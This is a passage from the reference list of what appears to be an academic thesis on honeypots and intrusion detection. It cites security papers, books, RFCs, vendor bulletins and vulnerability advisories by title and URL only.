[Honeynet Project 2007] Honeynet Project (Editor): Roo - Online User Manual. Published: 2007. http://old.honeynet.org/tools/cdrom/roo/manual/index.html, Retrieved: August 11, 2009
[iDefense 2005] iDefense (Editor): Tikiwiki Command Injection Vulnerability. Published: 2005. http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=335, Retrieved: August 11, 2009
[Ikinci et al. 2008] Ikinci, Ali ; Holz, Thorsten ; Freiling, Felix: Monkey-Spider: Detecting Malicious Websites with Low-Interaction Honeyclients.
In: Gesellschaft für Informatik: Sicherheit 2008, 2008
[Internet Assigned Numbers Authority (IANA) 2008] Internet Assigned Numbers Authority (IANA) (Editor): Port Numbers. Published: 2008. http://www.iana.org/assignments/port-numbers, Retrieved: August 11, 2009
[Ithilgore 2008] Ithilgore: Hacking Bash History. Published: July 2008. http://sock-raw.org/papers/bash_history, Retrieved: August 11, 2009
[Itzel 2007] Itzel, Laura A.: Eine Infrastruktur zur Einschätzung des aktuellen Gefährdungslevels durch Malware, University of Mannheim, Diplomarbeit, 2007. http://pi1.informatik.uni-mannheim.de/filepool/theses/diplomarbeit-2007-itzel.pdf
[Jestrix 2003] Jestrix: An Introduction to psyBNC. Published: 2003. http://old.honeynet.org/scans/scan28/sol/5/mirror/psyBNC.htm, Retrieved: August 11, 2009
[Joachims 2002] Joachims, Thorsten: Learning to Classify Text Using Support Vector Machines - Methods, Theory, and Algorithms. Kluwer Academic Publishers, 2002
[Jones 2006a] Jones, M. T. ; IBM DeveloperWorks (Editor): Inside the Linux Boot Process. Published: May 2006. http://www.ibm.com/developerworks/linux/library/l-linuxboot/, Retrieved: August 11, 2008
[Jones 2006b] Jones, M. T. ; IBM DeveloperWorks (Editor): Linux Initial RAM Disk (initrd) Overview. Published: 2006. http://www.ibm.com/developerworks/linux/library/l-initrd.html, Retrieved: August 11, 2009
[Jordan 2006] Jordan, Michael J.: Top Linux Live CD Distributions 2006. Published: May 2006. http://www.linux.org/dist/reviews/livecd_2006.html, Retrieved: August 11, 2009
[Jordan and Taylor 1998] Jordan, Tim ; Taylor, Paul: A Sociology of Hackers. In: The Sociological Review 46 (1998), No. 4, p. 757–780. http://www.isoc.org/inet98/proceedings/2d/2d_1.htm
[Jung et al. 2004] Jung, Jaeyeon ; Paxson, Vern ; Berger, Arthur W. ; Balakrishnan, Hari: Fast Portscan Detection Using Sequential Hypothesis Testing.
In: Proceedings of the IEEE Symposium on Security and Privacy, 2004 [Kacper 2006] Kacper: TR Newsportal - Remote File Include. Published: 2006. http://milw0rm.com/exploits/1789, Retrieved: August 11, 2009 [Keong 2004] Keong, Tan C.: Win2K/XP SDT Restore 0.2. Published: 2004. http: //www.security.org.sg/code/sdtrestore.html, Retrieved: August 11, 2009 165 References [Kim and Karp 2004] Kim, Hyang-Ah ; Karp, Brad: Autograph: Toward Automated, DistributedWorm Signature Detection. In: Proceedings of the 13th Conference on USENIX Security Symposium, 2004, p. 271286 [Klein 1990] Klein, Daniel V.: “Foiling the Cracker”: A Survey of, and Improvements to, Password Security. In: Proceedings of the Second USENIX Workshop on Security, 1990 [Knorr 2009] Knorr, Gerd: The VESA Frame Buffer Device. http://www.kernel.org/doc/Documentation/fb/vesafb.txt, gust 11, 2009 Published: 2009. Retrieved: Au- [Koziol et al. 2004] Koziol, Jack ; Litchfield, David ; Aitel, Dave ; Anley, Chris ; Eren, Sinan ; Mehta, Neel ; Hassell, Riley: The Shellcoder’s Handbook: Discovering and Exploiting Security Holes. Wiley & Sons, 2004 [Kreibich and Crowcroft 2004] Kreibich, Christian ; Crowcroft, Jon: Honeycomb - Creating Intrusion Detection Signatures Using Honeypots. In: ACM SIGCOMM Computer Communication Review 34 (2004), No. 1, p. 51–56 [Kroah-Hartman 2006] Kroah-Hartman, Greg: Linux Kernel in a Nutshell. O’Reilly, 2006 [Leckie and Kotagiri 2002] Leckie, Christopher ; Kotagiri, Ramamohanarao: A Probabilistic Approach to Detecting Network Scans. In: Network Operations and Management Symposium, 2002 [Levchenko et al. 2004] Levchenko, Kirill ; Paturi, Ramamohan ; Varghese, George: On the Difficulty of Scalably Detecting Network Attacks. In: Proceedings of the 11th ACM Conference on Computer and Communications Security, 2004 [Li et al. 
2006] Li, Zhichun ; Sanghi, Manan ; Chen, Yan ; Kao, Ming-Yang ; Chavez, Brian: Hamsa: Fast Signature Generation for Zero-day PolymorphicWorms with Provable Attack Resilience. In: Proceedings of the 2006 IEEE Symposium on Security and Privacy, 2006, p. 32–47 [Linux Kernel Organization 2008] Linux Kernel Organization (Editor): The Linux Kernel Archives. Published: 2008. http://www.kernel.org/, Retrieved: August 11, 2009 [Linux Kernel Organization 2009] Linux Kernel Organization (Editor): Kernel Parameters. Published: 2009. http://www.kernel.org/doc/Documentation/ kernel-parameters.txt, Retrieved: August 11, 2009 [Liu and Cheng 2009] Liu, Simon ; Cheng, Bruce: Cyberattacks: Why, What, Who, and How. In: IT Professional 11 (2009), No. 3, p. 14–21 166 References [Lougher and Okajima 2008] Lougher, Phillip ; Okajima, Junjiro: Squashfs LZMA. Published: March 2008. http://www.squashfs-lzma.org/, Retrieved: August 11, 2008 [Lucks 1998] Lucks, Stefan: Attacking Triple Encryption. In: Proceedings of the 5th International Workshop on Fast Software Encryption Bd. 1372, 1998, p. 239–253 [Madsys 2003] Madsys: Finding Hidden Kernel Modules. In: Phrack Magazine 61 (2003), No. 6 [Manning et al. 2008] Manning, Christopher D. ; Raghavan, Prabhakar ; Schütze, Hinrich: An Introduction to Information Retrieval. Cambridge University Press, 2008 [Matejicek 2008a] Matejicek, Tomas: Boot Parameters in Slax. Published: 2008. http://www.slax.org/documentation_boot_cheatcodes.php, Retrieved: August 11, 2009 [Matejicek 2008b] Matejicek, Tomas: Linux Live Scripts. Published: 2008. http: //www.linux-live.org/, Retrieved: August 11, 2009 [Mates 2008] Mates, Jeremy: OpenSSH Public Key Authentication. Published: October 2008. http://sial.org/howto/openssh/publickey-auth/, Retrieved: August 11, 2009 [Mazzariello 2008] Mazzariello, Claudio: IRC Traffic Analysis for Botnet Detection. 
In: Proceedings of the 2008 The Fourth International Conference on Information Assurance and Security, 2008 [McCarty 2003] McCarty, Bill: Automated Identity Theft. In: IEEE Security & Privacy 1 (2003), No. 5, p. 89–92 [McClure et al. 2005] McClure, Stuart ; Scambray, Joel ; Kurtz, George: Hacking Exposed: Network Security Secrets & Solutions. 5th Edition. McGraw-Hill, 2005 [Microsoft Corporation 2002] Microsoft Corporation (Editor): Microsoft Security Bulletin MS02-039. Published: 2002. http://www.microsoft.com/technet/ security/bulletin/MS02-039.mspx, Retrieved: August 11, 2009 [Microsoft Corporation 2003a] Microsoft Corporation (Editor): Microsoft Security Bulletin MS03-007. Published: 2003. http://www.microsoft.com/technet/ security/bulletin/MS03-007.mspx, Retrieved: August 11, 2009 [Microsoft Corporation 2003b] Microsoft Corporation (Editor): Microsoft Security Bulletin MS03-039. Published: 2003. http://www.microsoft.com/technet/ security/bulletin/MS03-039.mspx, Retrieved: August 11, 2009 167 References [Microsoft Corporation 2004a] Microsoft Corporation (Editor): Disabling Messenger Service in Windows XP. Published: Jan 2004. http://www.microsoft. com/windowsxp/using/security/learnmore/stopspamv45.mspx, Retrieved: August 11, 2009 [Microsoft Corporation 2004b] Microsoft Corporation (Editor): Microsoft Security Bulletin MS04-007. Published: 2004. http://www.microsoft.com/technet/ security/bulletin/ms04-007.mspx, Retrieved: August 11, 2009 [Microsoft Corporation 2004c] Microsoft Corporation (Editor): Microsoft Security Bulletin MS04-011. Published: 2004. http://www.microsoft.com/technet/ security/bulletin/MS04-011.mspx, Retrieved: August 11, 2009 [Microsoft Corporation 2009] Microsoft Corporation (Editor): Understanding User-Agent Strings. Published: 2009. http://msdn.microsoft.com/en-us/ library/ms537503.aspx, Retrieved: August 11, 2009 [Miniwatts Marketing Group 2008] Miniwatts Marketing Group (Editor): Internet Users in the World - Growth 1995-2010. 
Published: 2008. http://www. internetworldstats.com/emarketing.htm, Retrieved: August 11, 2009 [Mirkovic and Reiher 2004] Mirkovic, Jelena ; Reiher, Peter: A Taxonomy of DDoS Attack and DDoS Defense Mechanisms. In: ACM SIGCOMM Computer Communication Review 34 (2004), No. 2, p. 39–53 [Mokube and Adams 2007] Mokube, Iyatiti ; Adams, Michele: Honeypots: Concepts, Approaches, and Challenges. In: Proceedings of the 45th Annual Southeast Regional Conference, ACM Press, 2007, p. 321–326 [Mölsä 2005] Mölsä, Jarmo: Mitigating Denial of Service Attacks: A Tutorial. In: Journal of Computer Security 13 (2005), No. 6, p. 807–837 [Moore et al. 2003] Moore, David ; Paxson, Vern ; Savage, Stefan ; Shannon, Colleen ; Staniford, Stuart ; Weaver, Nicholas: Inside the Slammer Worm. In: IEEE Security & Privacy 1 (2003), July, No. 4 [Moore et al. 2006] Moore, David ; Shannon, Colleen ; Brown, Douglas J. ; Voelker, Geoffrey M. ; Savage, Stefan: Inferring Internet Denial-of-Service Activity. In: ACM Transactions on Computer Systems 24 (2006), No. 2, p. 115–139 [Mozilla Developer Center 2009] Mozilla Developer Center (Editor): User Agent Strings Reference. Published: 2009. https://developer.mozilla.org/en/User_ Agent_Strings_Reference, Retrieved: August 11, 2009 168 References [National Institute of Standards and Technology 1996] National Institute of Standards and Technology (Editor): An Introduction to Computer Security: The NIST Handbook. Published: 1996. http://csrc.nist.gov/publications/ nistpubs/800-12/handbook.pdf, Retrieved: August 11, 2009 [Negus 2007] Negus, Christopher: Live Linux CDs - Building and Customizing Bootables. Prentice Hall PTR, 2007 [Net Applications 2009] Net Applications (Editor): Operating System Market Share. Published: January 2009. http://marketshare.hitslink.com/ operating-system-market-share.aspx, Retrieved: August 11, 2009 [NETSEC 2009] NETSEC (Editor): Specter - Intrusion Detection System. Published: 2009. 
http://www.specter.com/, Retrieved: August 11, 2009 [Newsome et al. 2005] Newsome, James ; Karp, Brad ; Song, Dawn: Polygraph: Automatically Generating Signatures for Polymorphic Worms. In: Proceedings of the 2005 IEEE Symposium on Security and Privacy, 2005, p. 226–241 [NIST 1999] NIST (Editor): National Institute of Standards and Technology: Data Encryption Standard. Published: 1999. http://csrc.nist.gov/publications/ fips/fips46-3/fips46-3.pdf, Retrieved: August 11, 2009 [NIST 2001] NIST (Editor): National Institute of Standards and Technology: Advanced Encryption Standard (AES). Published: 2001. http://csrc.nist.gov/ publications/fips/fips197/fips-197.pdf, Retrieved: August 11, 2009 [NIST 2008] NIST (Editor): NSRL - National Software Reference Library. Published: 2008. http://www.nsrl.nist.gov/, Retrieved: August 11, 2009 [OpenSSL Project 2003] OpenSSL Project (Editor): RSA key processing tool. Published: January 2003. http://www.openssl.org/docs/apps/rsa.html, Retrieved: August 11, 2009 [Orebaugh et al. 2007] Orebaugh, Angela ; Ramirez, Gilbert ; Burke, Josh ; Pesce, Larry ; Wright, Joshua ; Morris, Greg: Wireshark & Ethereal Network Protocol Analyzer Toolkit. Syngress Publishing, 2007 [Östling 2006] Östling, Andreas: Oinkmaster Documentation. Published: January 2006. http://oinkmaster.sourceforge.net/readme.shtml, Retrieved: August 11, 2009 [Osvik et al. 2006] Osvik, Dag A. ; Shamir, Adi ; Tromer, Eran: Cache Attacks and Countermeasures: The Case of AES. In: RSA Conference, 2006, p. 1–20 169 References [Paola 2006] Paola, Stefano D.: MySql COM TABLE DUMP Memory Leak & MySql Remote B0f. Published: 2006. http://downloads.securityfocus. com/vulnerabilities/exploits/my_com_table_dump_exploit.c, Retrieved: August 11, 2009 [Parmelee et al. 1972] Parmelee, R. P. ; Peterson, T. I. ; Tillman, C. C. ; Hatfield, D. J.: Virtual Storage and Virtual Machine Concepts. In: IBM Journal of Research and Development 11 (1972), No. 2, p. 
99–130 [Paxson 1998] Paxson, Vern: Bro: A System for Detecting Network Intruders in RealTime. In: 7th USENIX Security Symposium, 1998 [Paxson et al. 1998] Paxson, Vern ; Almes, Guy ; Mahdavi, Jamshid ; Mathis, Mark M.: RFC: 2330 - Framework for IP Performance Metrics. Published: 1998. ftp://ftp.isi.edu/in-notes/rfc2330.txt, Retrieved: August 11, 2009 [Peng et al. 2007] Peng, Tao ; Leckie, Christopher ; Ramamohanarao, Kotagiri: Survey of Network-Based Defense Mechanisms Countering the DoS and DDoS Problems. In: ACM Computing Surveys 39 (2007), No. 1 [Perens 1998] Perens, Bruce: The Open Source Definition. Published: 1998. http: //perens.com/Articles/OSD.html, Retrieved: August 11, 2009 [Perlman 1999] Perlman, Radia: Interconnections. Bridges and Routers. 2nd Edition. Addison Wesley, 1999 [Pointer 1997] Pointer, Robey: Eggdrop - Main Documentation. Published: 1997. http://www.eggheads.org/support/egghtml/1.6.19/, Retrieved: August 11, 2009 [Pols 2007] Pols, Dr. A. ; Bundesverband Informationswirtschaft, Telekommunikation und neue Medien e.V. (Editor): E-Commerce 2006. Published: 2007. http://www.bitkom.org/de/presse/8477_43665.aspx, Retrieved: August 11, 2009 [Postel 1980] Postel, Jonathan: RFC: 768 - User Datagram Protocol. Published: 1980. http://www.faqs.org/rfcs/rfc768.html, Retrieved: August 11, 2009 [Postel 1981a] Postel, Jonathan: RFC: 791 - Internet Control Message Protocol. Published: 1981. http://www.faqs.org/rfcs/rfc792.html, Retrieved: August 11, 2009 [Postel 1981b] Postel, Jonathan: RFC: 791 - Internet Protocol. Published: 1981. http://www.faqs.org/rfcs/rfc791.html, Retrieved: August 11, 2009 170 References [Postel 1981c] Postel, Jonathan: RFC: 793 - Transmission Control Protocol. Published: 1981. http://www.faqs.org/rfcs/rfc793.html, Retrieved: August 11, 2009 [Pouget et al. 2005] Pouget, Fabien ; Dacier, Marc ; Pham, Van H.: Leurre.com: On the Advantages of Deploying a Large Scale Distributed Honeypot Platform. 
In: Proceedings of the E-Crime and Computer Conference, 2005 [Provos 2004] Provos, Niels: A Virtual Honeypot Framework. In: Proceedings of the 13th USENIX Security Symposium, 2004 [Provos and Holz 2007] Provos, Niels ; Holz, Thorsten: Virtual Honeypots: From Botnet Tracking to Intrusion Detection. Addison Wesley, 2007 [Ptacek and Newsham 1998] Ptacek, Thomas H. ; Newsham, Timothy N.: Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection. Published: 1998. http://insecure.org/stf/secnet_ids/secnet_ids.html, Retrieved: August 11, 2009 [QoSient 2006] QoSient (Editor): Argus Flow Models. Published: 2006. http: //www.qosient.com/argus/flow.htm, Retrieved: August 11, 2009 [Raymond 2003] Raymond, Eric S.: The Jargon File, Version 4.4.7. Published: December 2003. http://www.catb.org/jargon/, Retrieved: August 11, 2009 [Rhino Software 2004] Rhino Software (Editor): How Did Serv-U Get Installed on My Computer? Published: 2004. http://www.serv-u.com/suvirushack.asp, Retrieved: August 11, 2009 [Richardson 2008] Richardson, Robert ; Computer Security Institute (Editor): CSI Computer Crime & Security Survey 2008. Published: 2008. http://i.cmpnet. com/v2.gocsi.com/pdf/CSIsurvey2008.pdf, Retrieved: August 11, 2009 [Riden et al. 2007] Riden, Jamie ; McGeehan, Ryan ; Engert, Brian ; Mueter, Michael: Know your Enemy: Web Application Threats. Published: February 2007. http://www.honeynet.org/papers/webapp/, Retrieved: August 11, 2009 [Rogers 2000a] Rogers, Marc: A New Hacker Taxonomy. Published: 2000. http: //homes.cerias.purdue.edu/~mkr/hacker.doc, Retrieved: August 11, 2009 [Rogers 2000b] Rogers, Marc: Psychological Theories of Crime and “Hacking”. Published: 2000. http://homes.cerias.purdue.edu/~mkr/crime.doc, Retrieved: August 11, 2009 171 References [Rogers 2001] Rogers, Marc: A Social Learning Theory and Moral Disengagement Analysis of Criminal Computer Behavior: An Exploratory Study, University of Manitoba, Winnipeg, Manitoba, (PHD Thesis), August 2001. 
http://homes.cerias. purdue.edu/~mkr/cybercrime-thesis.pdf [Rogers 2005] Rogers, Marc: The Development of a Meaningful Hacker Taxonomy: A Two Dimensional Approach. In: CERIAS Tech Report 2005 (2005), July, No. 43. https://www.cerias.purdue.edu/assets/pdf/bibtex_archive/2005-43.pdf [Rowe and Pierce 1982] Rowe, Michael D. ; Pierce, Barbara L.: Sensitivity of the Weighting Summation Decision Method to Incorrect Application. In: Socio-Economic Planning Sciences 16 (1982), No. 4, p. 173–177 [Ruef 2007] Ruef, Marc: Die Kunst des Penetration Testing (German). C&L Computer und Literaturverlag, 2007 [Russell 2002] Russell, Rusty: Linux 2.4 Packet Filtering. Published: 2002. http:// www.netfilter.org/documentation/HOWTO//packet-filtering-HOWTO.html, Retrieved: August 11, 2009 [Russinovich and Solomon 2004] Russinovich, Mark E. ; Solomon, David A.: Microsoft Windows Internals. 4th Edition. Microsoft Press, 2004 [Sadasivam et al. 2005] Sadasivam, Karthik ; Samudrala, Banuprasad ; T. Andrew Yang: Design of Network Security Projects Using Honeypots. In: Journal of Computing Sciences in Colleges (2005), p. 282 – 293 [Schneier 1996] Schneier, Bruce: Applied Cryptography: Protocols, Algorithms, and Source Code in C. 2nd Edition. John Wiley & Sons, Inc., 1996 [Sebastiani 2002] Sebastiani, Fabrizio: Machine Learning in Automated Text Categorization. In: ACM Computing Surveys 34 (2002), No. 1, p. 1–47 [Secunia 2004] Secunia (Editor): Secunia Advisories: phpBB Multiple Vulnerabilities. Published: November 2004. http://secunia.com/advisories/13239/2/, Retrieved: August 11, 2009 [Secunia 2009a] Secunia (Editor): Secunia Advisories: Vulnerability Report: phpMyFAQ 1.x. Published: 2009. http://secunia.com/advisories/product/3487/ ?task=advisories, Retrieved: August 11, 2009 [Secunia 2009b] Secunia (Editor): Secunia Advisories: Vulnerability Report: Tikiwiki 1.x. Published: 2009. 
http://secunia.com/advisories/product/3356/?task= advisories, Retrieved: August 11, 2009 172 References [SecurityFocus 2004] SecurityFocus (Editor): Microsoft Windows LSASS Buffer Overrun Vulnerability. Published: 2004. http://www.securityfocus.com/bid/ 10108/exploit, Retrieved: August 11, 2009 [SecurityFocus 2006a] SecurityFocus (Editor): MySQL Remote Information Disclosure and Buffer Overflow Vulnerabilities. Published: 2006. http://www. securityfocus.com/bid/17780/discuss, Retrieved: August 11, 2009 [SecurityFocus 2006b] SecurityFocus (Editor): NewsPortal Remote PHP Script Code Injection Vulnerability. Published: 2006. http://www.securityfocus.com/bid/ 18000, Retrieved: August 11, 2009 [SecurityFocus 2006c] SecurityFocus (Editor): PHPMyAdmin Multiple Cross-Site Scripting Vulnerabilities. Published: 2006. http://www.securityfocus.com/bid/ 15735/, Retrieved: August 11, 2009 [SecurityFocus 2006d] SecurityFocus (Editor): Webmin/Usermin Unspecifed Information Disclosure Vulnerability. Published: June 2006. http://www. securityfocus.com/bid/18744/, Retrieved: August 11, 2009 [Seifert et al. 2006] Seifert, Christian ; Welch, Ian ; Komisarczuk, Peter: HoneyC - The Low-Interaction Client Honeypot. Published: August 2006. http: //homepages.mcs.vuw.ac.nz/~cseifert/blog/images/seifert-honeyc.pdf, Retrieved: August 11, 2009 [Seigo 2007] Seigo, Aaron J.: KDE Filesystem Hierarchy. Published: February 2007. http://techbase.kde.org/KDE_System_Administration/KDE_Filesystem_ Hierarchy, Retrieved: August 11, 2009 [Sen and Krömer 2008] Sen, Evrim ; Krömer, Jan: Hackerkultur und Raubkopierer Eine wissenschaftliche Reise durch zwei Subkulturen (German). 2008 [Sharma 2005] Sharma, Mayank: CLI Magic: Logrotate. Published: October 2005. http://www.linux.com/feature/48390, Retrieved: August 11, 2009 [Singh et al. 2004] Singh, Sumeet ; Estan, Cristian ; Varghese, George ; Savage, Stefan: Automated Worm Fingerprinting. 
In: Proceedings of the 6th Conference on Symposium on Opearting Systems Design & Implementation, 2004, p. 45–60 [Skoudis and Zeltser 2003] Skoudis, Ed ; Zeltser, Lenny: Malware: Fighting Malicious Code. Prentice Hall, 2003 [“B-Bstf” Smith 2004] Smith, Andrew “B-Bstf”: A Guide to Internet Piracy. In: 2600 - The Hacker Quarterly 21 (2004), No. 2, p. 26–29 173 References [Sourcefire 2009] Sourcefire (Editor): Snort Users Manual. Published: 2009. http: //www.snort.org/assets/82/snort_manual.pdf, Retrieved: August 11, 2009 [Spitzner 2000] Spitzner, Lance: Watching Your Logs. Published: 2000. http: //www.spitzner.net/swatch.html, Retrieved: August 11, 2009 [Spitzner 2001a] Spitzner, Lance: The Value of Honeypots, Part One: Definitions and Values of Honeypots. Published: 2001. http://www.securityfocus.com/infocus/ 1492, Retrieved: August 11, 2009 [Spitzner 2001b] Spitzner, Lance: The Value of Honeypots, Part Two: Honeypot Solutions and Legal Issues. Published: 2001. http://www.securityfocus.com/ infocus/1498, Retrieved: August 11, 2009 [Spitzner 2002] Spitzner, Lance: Honeypots: Tracking Hackers. Addison Wesley, 2002 [Spitzner 2003a] Spitzner, Lance: Definitions and Value of Honeypots. Published: 2003. http://www.spitzner.net/honeypots.html, Retrieved: August 11, 2009 [Spitzner 2003b] Spitzner, Lance: The Honeynet Project: Trapping the Hackers. In: IEEE Security & Privacy 1 (2003), No. 2, p. 15–23 [Spitzner 2003c] Spitzner, Lance: Honeypot Farms. Published: 2003. http://www. securityfocus.com/infocus/1720, Retrieved: August 11, 2009 [Spitzner 2003d] Spitzner, Lance: Honeypots: Are They Illegal? Published: June 2003. http://www.securityfocus.com/infocus/1703, Retrieved: August 11, 2009 [Spitzner 2003e] Spitzner, Lance: Honeypots: Simple, Cost-Effective Detection. Published: 2003. http://www.securityfocus.com/infocus/1690, Retrieved: August 11, 2009 [Spitzner 2003f] Spitzner, Lance: Honeytokens: The Other Honeypot. Published: 2003. 
http://www.securityfocus.com/infocus/1713, Retrieved: August 11, 2009 [Spitzner 2003g] Spitzner, Lance: Moving Forward with Defintion of Honeypots. Published: Mai 2003. http://www.securityfocus.com/archive/119/321957/30/ 0/threaded, Retrieved: August 11, 2009 [Spitzner 2004] Spitzner, Lance: Problems and Challenges with Honeypots. Published: 2004. http://www.securityfocus.com/infocus/1757, Retrieved: August 11, 2009 [Stevens and Merkin 1995] Stevens, Curtis E. ; Merkin, Stan: El Torito Bootable CD-ROM Format Specification. Published: January 1995. http: //www.phoenix.com/NR/rdonlyres/98D3219C-9CC9-4DF5-B496-A286D893E36A/0/ specscdrom.pdf, Retrieved: August 11, 2009 174 References [Stevens 1994] Stevens, William R.: TCP/IP Illustrated I - The Protocols. AddisonWesley, 1994 [Stillwell et al. 1981] Stillwell, W.G. ; Seaver, D.A. ; Edwards, W.: A Comparison of Weight Approximation Techniques in Multiattribute Utility Decision Making. In: Organizational Behavior and Human Performance (1981), p. 62–78 [Stoll 2005] Stoll, Cliff: The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage. Pocket Books, 2005 [SWITCH 2002] SWITCH: Default TTL Values in TCP/IP. Published: 2002. http://secfr.nerim.net/docs/fingerprint/en/ttl_default.html, Retrieved: August 11, 2009 [Tanenbaum 2003] Tanenbaum, Andrew S.: Computer Networks. 4th Edition. Prentice Hall, 2003 [Thomas and Martin 2006] Thomas, Rob ; Martin, Jerry: The Underground Economy: Priceless. In: The USENIX Magazine 31 (2006), No. 6, p. 7–16 [Timm 2001] Timm, Kevin: Strategies to Reduce False Positives and False Negatives in NIDS. Published: September 2001. http://www.securityfocus.com/infocus/ 1463, Retrieved: August 11, 2009 [Troan and Brown 2002] Troan, Erik ; Brown, Preston: LOGROTATE(8). Published: November 2002. http://www.linuxcommand.org/man_pages/logrotate8.html, Retrieved: August 11, 2009 [Trümper 1999] Trümper, Winfried: Summary about Posix.1e. Published: 1999. 
http://wt.tuxomania.net/publications/posix.1e/, Retrieved: August 11, 2009 [Turnbull 2005] Turnbull, James: Hardening Linux. APress, 2005 [Vaughan et al. 2000] Vaughan, Gary V. ; Elliston, Ben ; Tromey, Thomas: Gnu Autoconf, Automake, and Libtool. New Riders Publishing, 2000 [Venema 1992] Venema, Wietse: TCP Wrapper: Network Monitoring, Access Control and Booby Traps. In: Proceedings of the Third Usenix UNIX Security Symposium, 1992 [Vind 2005] Vind, Janek: XSS and Full Path Disclosure in PhpBB 2.0.8. Published: January 2005. http://www.waraxe.us/index.php?modname=sa&id=34, Retrieved: August 11, 2009 175 References [Visa Inc. 2002] Visa Inc. (Editor): Visa Card Verification Value 2 (CVV2) Merchant Guide - A Tool for Understanding CVV2 for Greater Fraud Protection. Published: February 2002. http://www.bbbonline.org/eexport/doc/merchantguide_cvv2. pdf, Retrieved: August 11, 2009 [VMWare 2006] VMWare (Editor): Virtualization Overview. Published: 2006. http: //www.vmware.com/pdf/virtualization.pdf, Retrieved: August 11, 2009 [Vogelgesang 2007] Vogelgesang, Kay: The XAMPP Security Console. Published: 2007. http://www.apachefriends.org/en/xampp-windows.html#1221, Retrieved: August 11, 2009 [Wagner and Soto 2002] Wagner, David ; Soto, Paolo: Mimicry Attacks on HostBased Intrusion Detection Systems. In: Proceedings of the 9th ACM Conference on Computer and Communications Security, 2002 [Wang et al. 2006] Wang, Jisheng ; Hamadeh, Ihab ; Kesidis, George ; Miller, David J.: Polymorphic Worm Detection and Defense: System Design, Experimental Methodology, and Data Resources. In: Proceedings of the 2006 SIGCOMM workshop on Large-scale attack defense, 2006, p. 169 – 176 [Wang et al. 2005] Wang, Yi-Min ; Beck, Doug ; Jiang, Xuxian ; Roussev, Roussi ; Verbowski, Chad ; Chen, Shuo ; King, Sam: Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That Exploit Browser Vulnerabilities / Microsoft Research. Published: August 2005. 
http://research.microsoft.com/en-us/um/redmond/projects/strider/ honeymonkey/ndss_2006_honeymonkey_wang_y_camera-ready.pdf. 2005 (MSRTR-2005-72). – Forschungsbericht [Watson 2007] Watson, David: GDH Global Distributed Honeynet. Published: December 2007. http://www.ukhoneynet.org/PacSec07_David_Watson_Global_ Distributed_Honeynet.pdf, Retrieved: August 11, 2009 [Watson et al. 2005] Watson, David ; Holz, Thorsten ; Mueller, Sven ; Honeynet Project (Editor): Know your Enemy: Phishing. Published: 2005. http://www. honeynet.org/papers/phishing/, Retrieved: August 11, 2009 [Wicherski and Holz 2006] Wicherski, Georg ; Holz, Thorsten: Effektives Sammeln von Malware mit Honeypots. In: Proceedings of 13th DFN-CERT Workshop, 2006 [Wikipedia 2007] Wikipedia: Comparison of Linux LiveDistros. Published: July 2007. http://en.wikipedia.org/wiki/Comparison_of_Linux_LiveDistros, Retrieved: August 11, 2009 176 References [Willems et al. 2007] Willems, Carsten ; Holz, Thorsten ; Freiling, Felix: Toward Automated Dynamic Malware Analysis Using CWSandbox. In: IEEE Security & Privacy 5 (2007), No. 2, p. 32–39 [Woo 2003] Woo, Hyung-Jin: The Hacker Mentality: Exploring the Relationship Between Psychological Variables and Hacking Activities, University of Georgia, (PHD Thesis), May 2003 [Wright et al. 2004] Wright, Charles P. ; Dave, Jay ; Gupta, Puja ; Krishnan, Harikesavan ; Zadok, Erez ; Zubair, Mohammad N.: Versatility and Unix Semantics in a Fan-Out Unification File System. Published: October 2004. http: //www.am-utils.org/docs/unionfs-tr/index.html, Retrieved: August 11, 2009 [Yoon and Hwang 1981] Yoon, Kwangsun ; Hwang, Ching-Lai: Multiple Attribute Decision Making: Methods and Applications. Springer, 1981 [Yoon and Hwang 1995] Yoon, Kwangsun ; Hwang, Ching-Lai: Multiple Attribute Decision Making: An Introduction. Sage, 1995 [Zalewski 2005] Zalewski, Michal: Silence on the Wire: A Field Guide to Passive Reconnaissance and Indirect Attacks. 
No Starch Press, 2005 [Zalewski 2006] Zalewski, Michal: p0f 2 - Passive OS Fingerprinting Tool. Published: 2006. http://lcamtuf.coredump.cx/p0f/README, Retrieved: August 11, 2009 [Zhang and Leckie 2006] Zhang, Dana ; Leckie, Christopher: An Evaluation Technique for Network Intrusion Detection Systems. In: Proceedings of the 1st International Conference on Scalable Information Systems, 2006 [Zhang 2004] Zhang, Harry: The Optimality of Naive Bayes. In: Proceedings of the 17th International FLAIRS Conference, 2004 177